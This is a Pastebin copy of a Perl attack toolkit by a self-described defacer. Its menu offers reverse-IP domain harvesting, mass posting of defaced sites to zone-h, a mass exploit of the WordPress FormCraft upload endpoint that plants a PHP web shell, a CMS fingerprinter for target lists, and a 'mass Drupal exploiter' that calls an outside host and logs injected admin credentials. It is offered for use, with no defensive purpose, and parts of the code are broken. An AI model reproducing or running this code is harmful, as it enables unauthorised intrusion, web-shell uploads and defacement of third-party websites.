Guest User

Untitled

a guest
Feb 14th, 2018
991
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.92 KB | None | 0 0
  1. #!/usr/bin/perl
  2.  
  3. #Coded By Kadd3chy
  4.  
  5. use HTTP::Request;
  6. use LWP::UserAgent;
  7. use Digest::MD5;
  8. use MIME::Base64;
  9. use LWP::Simple;
  10. use IO::Socket;
  11. use HTTP::Request::Common;
  12. use Term::ANSIColor;
  13.  
  14. $logo="
  15.  
  16. db dD .d8b. d8888b. d8888b. d8888b. .o88b. db db db db db db d88888b db d8888b. d88888b d8888b. db db d8888b. .d88b.
  17. 88 ,8P' d8' `8b 88 `8D 88 `8D VP `8D d8P Y8 88 88 `8b d8' 88 88 88' 88 88 `8D 88' 88 `8D 88 88 VP `8D .8P 88.
  18. 88,8P 88ooo88 88 88 88 88 oooY' 8P 88ooo88 `8bd8' 88ooo88 88ooooo 88 88oodD' 88ooooo 88oobY' Y8 8P oooY' 88 d'88
  19. 88`8b 88~~~88 88 88 88 88 ~~~b. 8b 88~~~88 88 88~~~88 88~~~~~ 88 88~~~ 88~~~~~ 88`8b `8b d8' ~~~b. 88 d' 88
  20. 88 `88. 88 88 88 .8D 88 .8D db 8D Y8b d8 88 88 88 88 88 88. 88booo. 88 88. 88 `88. `8bd8' db 8D db `88 d8'
  21. YP YD YP YP Y8888D' Y8888D' Y8888P' `Y88P' YP YP YP YP YP Y88888P Y88888P 88 Y88888P 88 YD YP Y8888P' VP `Y88P'
  22.  
  23. \n";
  24. print $logo;
  25. print color("magenta"),"[1] Reverse IP\n";
  26. print color("green"),"[2] Zone-H Mass Poster\n";
  27. print color("cyan"),"[3] Formcraft Mass File Upload\n";
  28. print color("red"),"[4] Website Checker By (Adam TNX)\n";
  29. print color("yellow"),"[5] Mass Drupal Exploiter By (Adam TNX)\n";
  30. print color("blue"),"[6] About Me\n";
  31. print color("white"),"[+] Choose Number : ";
  32. my $targett = <>;
  33. chomp $targett;
  34. if($targett eq '1')
  35. {
  36. system('cls');
  37. system('title Reverse IP');
  38. {
  39. use HTTP::Request;
  40. use LWP::UserAgent;
  41. if($^O =~ /Win/){
  42.  
  43. system("cls");
  44. system("color c");
  45. system("title Reverse Domain Recoded By Kadd3chy");
  46.  
  47. }else{
  48.  
  49. system("clear");
  50. }
  51. print q{
  52.  
  53. *----------------------*
  54. | [+] Reverse IP [+] |
  55. | Run Me Now |
  56. | Result in yes.txt |
  57. *----------------------*
  58. };
  59. print "\n[-]Use Proxy ? (Y/N):";
  60. my $chose = <>;
  61. chomp($chose);
  62.  
  63. if(lc($chose) eq 'y') {
  64. sleep (3);
  65. print "\n\n [+]Put Proxy (ex: 127.0.0.1:80) :";
  66. my $proxy = <>;
  67. chomp($proxy);
  68. print "\n\n[*]Put Host or IP (host without http://) :";
  69. my $host = <>;
  70. chomp($host);
  71. my $file = "yes.txt";
  72. $ua = LWP::UserAgent->new;
  73. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
  74. $ua->proxy('http', 'http://'.$proxy.'');
  75. my $zz = $ua->post('http://domains.yougetsignal.com/domains.php',
  76. {
  77. remoteAddress => $host,
  78. }
  79. );
  80.  
  81. my $resulta = $zz->content;
  82. while ($resulta =~ m/\[([^\]]*)\]/g)
  83. {
  84. $zeb = $1;
  85. $zeb =~ m/\"(.*?)\", \"?\"/g;
  86. open(a, ">>yes.txt");
  87. print a "http://$1/\n";
  88. close(a);
  89. }
  90. if($resulta =~ /\"domainCount\":\"(.*?)\"/) {
  91. sleep(2);
  92. print "\n [*]Total website Recolted: $1\n";
  93. }
  94. if($resulta =~ /\"remoteIpAddress\":\"(.*?)\"/) {
  95. sleep(1);
  96.  
  97. print "\n [*]IP serveur: $1\n";
  98. }
  99. print "\n[+]All website Reversed.\n";
  100. }
  101. if(lc($chose) eq 'n') {
  102.  
  103. print "\nPut Host or IP (host without http://) :";
  104. my $host = <>;
  105. chomp($host);
  106. my $file = "yes.txt";
  107. my $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5');
  108. my $zz = $ua->post('http://domains.yougetsignal.com/domains.php',
  109. {
  110. remoteAddress => $host,
  111. }
  112. );
  113.  
  114. my $resulta = $zz->content;
  115. while ($resulta =~ m/\[([^\]]*)\]/g)
  116. {
  117. $zeb = $1;
  118. $zeb =~ m/\"(.*?)\", \"?\"/g;
  119. open(a, ">>yes.txt");
  120. print a "http://$1/\n";
  121. close(a);
  122. }
  123. if($resulta =~ /\"domainCount\":\"(.*?)\"/) {
  124. sleep(2);
  125. print "\n [*]Total website Recolted: $1\n";
  126. }
  127. if($resulta =~ /\"remoteIpAddress\":\"(.*?)\"/) {
  128. sleep(1);
  129.  
  130. print "\n [*]IP serveur: $1\n";
  131. }
  132. print "\n[+]All website Reversed.\n";
  133. }}
  134. }
  135. if($targett eq '2')
  136. {
  137. use URI::URL;
  138. use LWP::UserAgent;
  139. use Term::ANSIColor;
  140. use IO::Socket::INET;
  141. use HTTP::Request;
  142. use HTTP::Request::Common qw(POST);
  143. use HTTP::Request::Common qw(GET);
  144.  
  145.  
  146. print "[START] Give Me Sites List :";
  147. my $list=<STDIN>;
  148. chomp($list);
  149. open (THETARGET, "<$list") || die "[-] Can't open the Website list !";
  150. @TARGETS = <THETARGET>;
  151. close THETARGET;
  152. $link=$#TARGETS + 1;
  153. foreach $tofuck(@TARGETS){
  154.  
  155. chomp($tofuck);
  156.  
  157.  
  158.  
  159. $req = HTTP::Request->new(GET=>$tofuck);
  160. $useragent = LWP::UserAgent->new();
  161. $response = $useragent->request($req);
  162. $ar = $response->content;
  163. if ($ar =~ /Hacked|Kadd3chy|HACKED|Kadd3chy/){
  164. open (TEXT, '>>Defaced.txt');
  165. print TEXT "\n$tofuck => Posted !!\n\n";
  166. close (TEXT);
  167. print colored ("Wait I'wll Post it Now",'white on_magenta'),"\n";
  168. $dmn= $Kadd3chy;
  169. $def="Kadd3chy";
  170. $zn="http://zone-h.org/notify/single";
  171. $lwp=LWP::UserAgent->new;
  172. $res=$lwp -> post($zn,[
  173. 'defacer' => $def,
  174. 'domain1' => $dmn,
  175. 'hackmode' => '15',
  176. 'reason' => '1',
  177. 'submit' => 'Send',
  178. ]);
  179. if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
  180. print "$dmn submit $1\n";
  181. }
  182. else
  183. {
  184. print colored ("[ERROR]CANT POST Gass",'white on_red'),"\n";
  185. }
  186. }
  187. }}
  188. if($targett eq '3')
  189. {
  190. use HTTP::Request;
  191. use LWP::UserAgent;
  192. use IO::Select;
  193. use HTTP::Response;
  194. use Term::ANSIColor;
  195. use HTTP::Request::Common qw(POST);
  196. use HTTP::Request::Common qw(GET);
  197. use URI::URL;
  198. use IO::Socket::INET;
  199. use LWP::UserAgent;
  200. use Win32::Console::ANSI;
  201. use HTTP::Request;
  202. use Win32::Console::ANSI;
  203. #if u use linux system remove the last line :p
  204. #hacked by Kadd3chy
  205. $Kadd3chy ="
  206. _ __ _ _ ____ _
  207. | |/ / | | | |___ \ | |
  208. | ' / __ _ __| | __| | __) | ___| |__ _ _
  209. | < / _` |/ _` |/ _` ||__ < / __| '_ \| | | |
  210. | . \ (_| | (_| | (_| |___) | (__| | | | |_| |
  211. |_|\_\__,_|\__,_|\__,_|____/ \___|_| |_|\__, |
  212. __/ |
  213. |___/
  214. Kadd3chy_Shell_Uploader\n
  215. WordPress Plugins FormCraft
  216. ";
  217. print $Kadd3chy;
  218. my $ua = LWP::UserAgent->new;
  219. $ua->timeout(10);
  220. open(tarrget,"<$ARGV[0]") or die "Open Ur Fucking Eyes :D\n";
  221. while(<tarrget>){
  222. chomp($_);
  223. $site = $_;
  224.  
  225. riahi();
  226.  
  227.  
  228.  
  229.  
  230. sub riahi(){
  231. $ua = LWP::UserAgent->new(keep_alive => 1);
  232. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  233. $ua->timeout (10);
  234. $link = $site."/wp-content/plugins/formcraft/file-upload/server/php/";
  235. my $conte = $ua->get("$link")->content;
  236. if ($conte =~/{"files"/){
  237.  
  238. print color("green"), "[vuln]";
  239. print color('reset');
  240. print " $site\n";
  241. up();
  242. }else{
  243.  
  244. print "$site Nçt Vul :(\n";
  245. }
  246.  
  247. }
  248.  
  249. sub up(){
  250. my $url = "$site/wp-content/plugins/formcraft/file-upload/server/php/";
  251. my $picture ="cloud.php";
  252. my $field_name = "files[]";
  253.  
  254. my $response = $ua->post( $url,
  255. Content_Type => 'form-data',
  256. Content => [ $field_name => ["$picture"] ]
  257.  
  258. );
  259. $upzzspy = $site. '/wp-content//plugins//formcraft//file-upload//server//php//files//cloud.php';
  260. my $taz = $ua->get("$upzzspy")->content;
  261. if ($taz =~ /Mister Spy/){
  262. print color('bold green');
  263. print "Success ... :D\n";
  264. print "--> $upzzspy\n";
  265.  
  266. print color('reset');
  267. print color('reset');
  268. open(save, '>>Kadd3chy.txt');
  269. print save "$upzzspy\n";
  270. close(save);
  271. }else{
  272. print "...Failed :(\n";
  273. }
  274. }
  275.  
  276. }
  277. sub zoneh(){
  278.  
  279. print colored ("",'Bold Green');
  280.  
  281. $hackname="Kadd3chy";
  282. $zone="http://zone-h.org/notify/single";
  283. $gh=LWP::UserAgent->new;
  284. $res=$gh -> post($zone,['defacer' => $hackname,'domain1' => $def,'hackmode' => '14','reason' => '5','submit' => 'Send',]);
  285. if ($res->content =~ /color="red">ERROR<\/font><\/li>/) {
  286. print color('reset');
  287. print "[+] POSTING TO ZONE-H - ";
  288. print color("red"), "ERROR\n";
  289. print color('reset');
  290. }
  291. elsif ($res->content =~ /color="red">OK<\/font><\/li>/) {
  292. print color('reset');
  293. print "[+] POSTING TO ZONE-H - ";
  294. print color("green"), "DONE\n";
  295. print color('reset');
  296. open(save, '>>Zone-H.txt');
  297. print save "$deface\n";
  298. close(save);
  299. }
  300. }
  301. }
  302. if($targett eq '4')
  303. {
  304. use HTTP::Request;
  305. use LWP::UserAgent;
  306. use IO::Select;
  307. use HTTP::Response;
  308. use Term::ANSIColor;
  309. print color('reset');
  310. if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
  311. my $tnx ="
  312. . .
  313. ` y` /: ``
  314. `` /d: -- `sd` .
  315. ```:sd+. -oooy: /yd+.``
  316. `` `` .ymh- /syyydo `ommo`````.
  317. `-:`` `oym/ `yyyyNm `ddy/ `.:`
  318. ./:-.`` `.+- +ys+hMm y/` ``.-::
  319. .ss+-``` ` . -smdMs -` .`./oy/
  320. :+oo/:. `` /- `o/yMo ```.:/oo/.
  321. -+os+:..- `/hs: -/ydM: .-`-/ooo/`
  322. -:-.`-.` ohh-y +- +M` --.`---`
  323. :/o+:-.+/ `yd:/`/.-so :s/.-/o+/.
  324. -.o` -+:-h/hsd/--:+/` //..
  325. ./yo+-/+yo-
  326. .`y- `
  327. Coded by Adam Tnx `N:`
  328. fb/adam.ag.750 s.`
  329. `
  330.  
  331. \n\n
  332. ";
  333.  
  334. print color('bold red');
  335.  
  336. print $tnx;
  337. print color("red"), "Tnx Website Checker -- Run me Now \n";
  338. print "List : \n";
  339. $list=<STDIN>;
  340.  
  341. open(tarrget,"<$list") or die "add list \n";
  342. while(<tarrget>){
  343. chomp($_);
  344. $site = $_;
  345. if($site !~ /http:\/\//) { $site = "http://$site/"; };
  346. laweej();
  347. }
  348. system("PAUSE");
  349.  
  350. sub laweej($site){
  351. $ua = LWP::UserAgent->new(keep_alive => 1);
  352. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  353. $ua->timeout (15);
  354.  
  355. my $tnx = $ua->get("$site")->content;
  356. if($tnx =~/wp-content\/themes\/|wp-content\/plugins\/|wordpress/) {
  357. print color('green');
  358. print "--WORDPRESS-- / $site \n";
  359. print color('reset');
  360. open(save, '>>wordpress.txt');
  361. print save "$site\n";
  362. close(save);
  363.  
  364.  
  365. }
  366.  
  367. elsif($tnx =~/<script type=\"text\/javascript\" src=\"\/media\/system\/js\/mootools.js\"><\/script>|Joomla!|Joomla|joomla/) {
  368. print color('green');
  369. print "--JOOMLA-- / $site \n";
  370. print color('reset');
  371. open(save, '>>joomla.txt');
  372. print save "$site\n";
  373. close(save);
  374.  
  375. }
  376. elsif($tnx =~/\/modules\/system\/system.menus.css|\/sites\/default\/files\/|<meta name=\"Generator\" content=\"Drupal 7/) {
  377. print color('green');
  378. print "--DRUPAL-- / $site \n";
  379. print color('reset');
  380. open(save, '>>drupal.txt');
  381. print save "$site\n";
  382. close(save);
  383.  
  384.  
  385. }elsif($tnx =~/\/Prestashop|\/js\/jquery\/plugins\/|<meta name=\"Generator\" content=\"Prestashop/) {
  386. print ;
  387. print "--Prestashop-- / $site \n";
  388. print color('reset');
  389. open(save, '>>Prestashop.txt');
  390. print save "$site\n";
  391. close(save);
  392.  
  393.  
  394.  
  395. }
  396. }}
  397. if($targett eq '5')
  398. {
  399. use HTTP::Request;
  400. use LWP::UserAgent;
  401. use IO::Select;
  402. use HTTP::Response;
  403. use Term::ANSIColor;
  404. print color('reset');
  405. if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }
  406. my $tnx ="
  407. . .
  408. ` y` /: ``
  409. `` /d: -- `sd` .
  410. ```:sd+. -oooy: /yd+.``
  411. `` `` .ymh- /syyydo `ommo`````.
  412. `-:`` `oym/ `yyyyNm `ddy/ `.:`
  413. ./:-.`` `.+- +ys+hMm y/` ``.-::
  414. .ss+-``` ` . -smdMs -` .`./oy/
  415. :+oo/:. `` /- `o/yMo ```.:/oo/.
  416. -+os+:..- `/hs: -/ydM: .-`-/ooo/`
  417. -:-.`-.` ohh-y +- +M` --.`---`
  418. :/o+:-.+/ `yd:/`/.-so :s/.-/o+/.
  419. -.o` -+:-h/hsd/--:+/` //..
  420. ./yo+-/+yo-
  421. .`y- `
  422. Coded by Adam Tnx `N:`
  423. fb/adam.ag.750 s.`
  424. `
  425.  
  426. \n\n
  427. ";
  428.  
  429. print color('bold blue');
  430.  
  431. print $tnx;
  432. print color("red"), "W3lcome..New Mass Drupal exploiter \n";
  433. print color("green"), "If you need some website use the dorker \n";
  434. print color("green"), " you will find it with this bot \n";
  435. print "List : \n";
  436. $list=<STDIN>;
  437. open(tarrget,"<$list") or die "add list \n";
  438. while(<tarrget>){
  439. chomp($_);
  440. $target = $_;
  441. if($target !~ /www./) { $target = "www.$target"; };
  442. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  443.  
  444. my $exploit = "http://www.xgames.co.il/drupal_mass_exploiter.php";
  445. my $checkk = $ua->get("$exploit")->content;
  446. if($checkk =~/Success! Log in with username \"adamtnx\" and password \"admin\" at/) {
  447. print color('bold white');
  448. print "[";
  449. print color('reset');
  450. print color('bold green');
  451. print "OK";
  452. print color('reset');
  453. print color('bold white');
  454. print "] ";
  455. print color ('green');
  456. print "$target";
  457. print color ('reset');
  458. print " tneek :) !! \n";
  459.  
  460.  
  461. open(save, '>>tnxVuln.txt');
  462.  
  463. print save " Don3 ! $target | username : adamtnx | pass: admin\n";
  464.  
  465. close(save);
  466. }
  467. else {
  468.  
  469. #####################
  470. ###Error Mafaka#####
  471. #####################
  472. print color ('blue');
  473. print "$target";
  474. print color ('reset');
  475. print " OOPS !! not vuln! \n";
  476. }
  477. }}
  478. if($targett eq '6')
  479. {
  480. system('title About Me');
  481. print color("red"),"Coder : Kadd3chy Tnx\n";
  482. print color("blue"),"Mail : moat3z.kadd3chy[AT]gmail [com] | Facebook ID : Kadd3chy.py \n";
  483. print color("white"), "Special Thanks To : Adam Tnx\n";
  484. system("pause");
  485. }
Add Comment
Please, Sign In to add comment